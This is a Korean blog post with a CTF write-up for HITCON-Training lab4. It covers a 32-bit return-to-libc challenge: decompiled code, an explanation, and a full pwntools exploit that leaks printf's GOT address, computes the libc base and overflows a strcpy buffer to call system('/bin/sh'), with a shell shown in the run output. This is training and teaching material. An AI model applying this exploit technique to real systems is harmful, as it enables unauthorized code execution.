[HITCON-Training] lab4

2019. 11. 4. 08:19Wargame & CTF/HITCON-Training

HITCON-Training lab4

Summary

  • 32bit

  • return to libc

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char **v3; // ST04_4
  int v4; // ST08_4
  char src; // [esp+12h] [ebp-10Eh]
  char buf; // [esp+112h] [ebp-Eh]
  _DWORD *v8; // [esp+11Ch] [ebp-4h]

  puts("###############################");
  puts("Do you know return to library ?");
  puts("###############################");
  puts("What do you want to see in memory?");
  printf("Give me an address (in dec) :");
  fflush(stdout);
  read(0, &buf, 0xAu);
  v8 = (_DWORD *)strtol(&buf, v3, v4);
  See_something(v8);
  printf("Leave some message for me :");
  fflush(stdout);
  read(0, &src, 0x100u);
  Print_message(&src);
  puts("Thanks you ~");
  return 0;
}

See_something

int __cdecl See_something(_DWORD *a1)
{
  return printf("The content of the address : %p\n", *a1);
}

Print_message

int __cdecl Print_message(char *src)
{
  char dest; // [esp+10h] [ebp-38h]

  strcpy(&dest, src);
  return printf("Your message is : %s", &dest);
}

See_something에서 printf의 got를 입력하면 printf의 주소가 나온다. main에서 입력을 받고 see_something으로 간다. dest에 입력받은것을 복사하고 거기서 오버플로우가 터진다. printf의 주소를 가지고 libc_base를 구하고 system의 주소를 구한다. 그리고 system안에있는 "/bin/sh"의 주소를 구해 준다.

Exploit

from pwn import *

e = ELF("./ret2lib")
p = process("./ret2lib")
libc = e.libc

binsh = "/bin/sh\x00"
pr = 0x8048399

p.recvuntil(":")
p.sendline(str(e.got["printf"]))

p.recvuntil("0x")
printf_addr = int("0x" + p.recv(8), 0)
libc_base = printf_addr - libc.symbols["printf"]

p.recvuntil(":")

payload = ""
payload += "A"*(0x38+0x4)
payload += p32(libc_base + libc.symbols["system"])
payload += p32(pr)
payload += p32(libc_base + list(libc.search("/bin/sh"))[0])

p.send(payload)
#p.sendline(binsh)
p.interactive()
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab4$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab4/ret2lib'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './ret2lib': pid 4729
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) 그룹들=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)


저작자표시 (새창열림)

'Wargame & CTF > HITCON-Training' 카테고리의 다른 글

[HITCON-Training] lab7  (0) 2019.11.18
[HITCON-Training] lab5  (0) 2019.11.11
[HITCON-Training] lab3  (0) 2019.10.30
[HITCON-Training] lab2  (0) 2019.10.30
[HITCON-Training] lab1  (0) 2019.10.30

관련글

댓글 0

티스토리툴바